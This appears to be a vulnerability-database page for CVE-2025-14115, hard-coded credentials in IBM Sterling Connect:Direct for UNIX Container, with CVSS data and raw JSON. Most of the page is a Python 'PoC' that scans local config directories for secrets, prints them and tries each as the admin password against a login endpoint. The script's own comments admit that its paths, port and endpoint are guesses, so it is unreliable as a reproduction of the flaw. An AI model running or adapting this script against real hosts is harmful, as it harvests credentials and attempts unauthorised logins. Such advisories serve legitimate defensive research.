Security Vulnerability Report
CVE-2025-14115 CVSS 8.4 HIGH

CVE-2025-14115

Published: 2026-01-20 15:16:14
Last Modified: 2026-04-15 00:35:42

Description

IBM Sterling Connect:Direct for UNIX Container 6.3.0.0 through 6.3.0.6 Interim Fix 016, and 6.4.0.0 through 6.4.0.3 Interim Fix 019, contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No structured configuration data available. Affected versions, as listed in the description:

IBM Sterling Connect:Direct for UNIX Container 6.3.0.0 - 6.3.0.6 Interim Fix 016
IBM Sterling Connect:Direct for UNIX Container 6.4.0.0 - 6.4.0.3 Interim Fix 019

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
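"""CVE-2025-14115 PoC - IBM Sterling Connect:Direct hard-coded credentials.

The script has two independent steps:

1. ``search_hardcoded_credentials`` scans configuration-like files under a
   fixed list of local directories for quoted ``name = "value"`` assignments
   whose name contains password / passwd / key / secret / encrypt.
2. ``exploit_hardcoded_credential`` posts one candidate value to a login URL
   on ``TARGET_HOST``.

NOTE(review): the advisory describes the flaw only as hard-coded credentials
(CWE-798) with a local attack vector (AV:L). It names no file, no credential
and no HTTP endpoint. The directories, the ``/api/login`` path, port 8443 and
the ``admin`` user below are this listing's own assumptions, not documented
product behaviour. An empty result therefore does not show that a host is
unaffected; compare the installed version and interim-fix level with the
affected ranges in the advisory instead.
"""

import os
import re
import subprocess  # not used anywhere in this listing

TARGET_HOST = "target_server"
TARGET_PORT = 8443

# Quoted right-hand side shared by every pattern: = '...' or = "...".
_QUOTED_VALUE = r"\s*=\s*['\"][^'\"]+['\"]"

# One pattern per keyword, compiled once. The original list carried both
# "password" and "PASSWORD"; with re.IGNORECASE they are the same pattern, so
# every password hit was reported twice (and tried twice by main()).
# There is no word boundary: "key" also matches names such as "apikey" or
# "monkey", so expect false positives.
_CREDENTIAL_PATTERNS = tuple(
    re.compile(keyword + _QUOTED_VALUE, re.IGNORECASE)
    for keyword in ("password", "passwd", "key", "secret", "encrypt")
)

# Directories walked by the scan (assumed install/config locations, see the
# module docstring).
_SEARCH_PATHS = (
    "/opt/ibm/cdirect/",
    "/opt/IBM/ConnectDirect/",
    "/etc/cdirect/",
    "./config/",
)

# File suffixes that are opened. A .jar is a zip archive, so reading it as
# text only exposes entries stored without compression.
_SCANNED_SUFFIXES = ('.conf', '.cfg', '.xml', '.properties', '.py', '.sh', '.jar')


def search_hardcoded_credentials():
    """Scan the fixed search paths for credential-looking assignments.

    Returns:
        A list of dicts, one per (file, pattern) pair that matched, each with
        ``'file'`` (path of the file) and ``'matches'`` (the matched
        ``name = "value"`` strings, secret included).
    """
    found_credentials = []
    for base in _SEARCH_PATHS:
        if not os.path.exists(base):
            continue
        for root, _dirs, files in os.walk(base):
            for name in files:
                if not name.endswith(_SCANNED_SUFFIXES):
                    continue
                filepath = os.path.join(root, name)
                try:
                    # errors='ignore' drops undecodable bytes instead of raising.
                    with open(filepath, 'r', encoding='utf-8', errors='ignore') as f:
                        content = f.read()
                except OSError:
                    # Unreadable file (permissions, vanished, ...): best effort, skip it.
                    continue
                for pattern in _CREDENTIAL_PATTERNS:
                    matches = pattern.findall(content)
                    if matches:
                        found_credentials.append({
                            'file': filepath,
                            'matches': matches,
                        })
    return found_credentials


def exploit_hardcoded_credential(credential):
    """Post one candidate credential to the assumed login endpoint.

    Args:
        credential: Candidate password value, sent with the fixed user
            ``admin``.

    Returns:
        The ``token`` field of the JSON response when the server answers
        HTTP 200, otherwise ``None``.
    """
    # Third-party dependency; imported here so the local scan works on a host
    # where it is not installed.
    import requests

    auth_payload = {
        'username': 'admin',
        'password': credential,
    }
    try:
        # verify=False turns off certificate validation, so the candidate
        # secret is sent to whichever server answers at TARGET_HOST.
        response = requests.post(
            f'https://{TARGET_HOST}:{TARGET_PORT}/api/login',
            json=auth_payload,
            verify=False,
            timeout=10,
        )
        if response.status_code == 200:
            token = response.json().get('token')
            print("[!] Successfully authenticated with hardcoded credential!")
            # The token is written to stdout in clear and will end up in any
            # captured terminal or job log.
            print(f"[*] Token: {token}")
            return token
    except Exception as e:
        print(f"[*] Authentication attempt failed: {e}")
    return None


def main():
    """Run the scan, print every hit, and try each hit against the endpoint.

    Every matched assignment is printed verbatim, so the output contains the
    secret values found on disk. Each match, including false positives,
    triggers one request to ``TARGET_HOST``.
    """
    print("[*] CVE-2025-14115 - IBM Sterling Connect:Direct Hard-coded Credentials PoC")
    print("[*] Searching for hardcoded credentials...")
    credentials = search_hardcoded_credentials()
    if credentials:
        print(f"[!] Found {len(credentials)} potential hardcoded credentials")
        for cred in credentials:
            print(f"\n[File] {cred['file']}")
            for match in cred['matches']:
                print(f" - {match}")
                # Value = text between the first and second '=' with quotes
                # and spaces stripped.
                exploit_hardcoded_credential(match.split('=')[1].strip('\"\' '))
    else:
        print("[*] No hardcoded credentials found in standard locations")
        print("[*] Try manual inspection of configuration files and binaries")


if __name__ == "__main__":
    main()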

References

https://www.ibm.com/support/pages/node/7257143 (the only reference listed in the raw record below)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14115", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:16:14.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling Connect:Direct for UNIX Container 6.3.0.0 through 6.3.0.6 Interim Fix 016, and 6.4.0.0 through 6.4.0.3 Interim Fix 019 IBM® Sterling Connect:Direct for UNIX contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data."}, {"lang": "es", "value": "IBM Sterling Connect:Direct para UNIX Contenedor 6.3.0.0 hasta 6.3.0.6 Arreglo Provisional 016, y 6.4.0.0 hasta 6.4.0.3 Arreglo Provisional 019 IBM® Sterling Connect:Direct para UNIX contiene credenciales codificadas de forma rígida, como una contraseña o clave criptográfica, que utiliza para su propia autenticación de entrada, comunicación de salida a componentes externos, o cifrado de datos internos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-798"}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7257143", "source": "[email protected]"}]}}